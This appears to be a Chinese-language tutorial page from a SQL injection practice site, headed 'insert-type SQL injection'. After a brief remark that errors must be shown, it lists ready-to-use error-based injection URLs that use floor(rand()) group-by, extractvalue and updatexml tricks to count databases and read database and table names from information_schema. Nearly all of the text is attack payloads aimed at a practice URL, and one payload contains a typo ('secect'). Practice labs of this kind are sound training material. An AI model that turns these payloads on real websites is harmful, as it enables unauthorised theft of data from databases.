select * from article where id = 6

(调试信息,此颜色区域只为输出sql语句,让您更好的理解sql注入,正常网站不会在页面显示)

insert型SQL注入
时间:2018-05-07 10:47:31
热度: 0

insert 型注入,有一个前提条件,就是执行sql语句的时候, 要加上mysqli_error()函数 如下: $result = mysqli_query($conn,$sql) or die(mysqli_error($conn)); 练习地址:左侧导航栏最下方, http://xss.tv/sql-article/addarticle.php 爆出注入函数 获取有多少个数据库 http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,count(schema_name),0x7e) from information_schema.schemata)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables  group by x)a)-- - 通过limit 获取所有数据库名 http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e, schema_name, 0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- - 2、通过ExtractValue报错 and extractvalue(1, payload) http://xss.tv/sql-article/showarticle.php?id=1319' and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and updatexml(1,concat(0x23,(select table_name from  information_schema.tables where table_schema='newblog' limit 0,1),0x23),1)-- - -- - 3、通过UpdateXML报错 +and updatexml(1,payload,1) http://xss.tv/sql-article/showarticle.php?id=1319' and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)-- -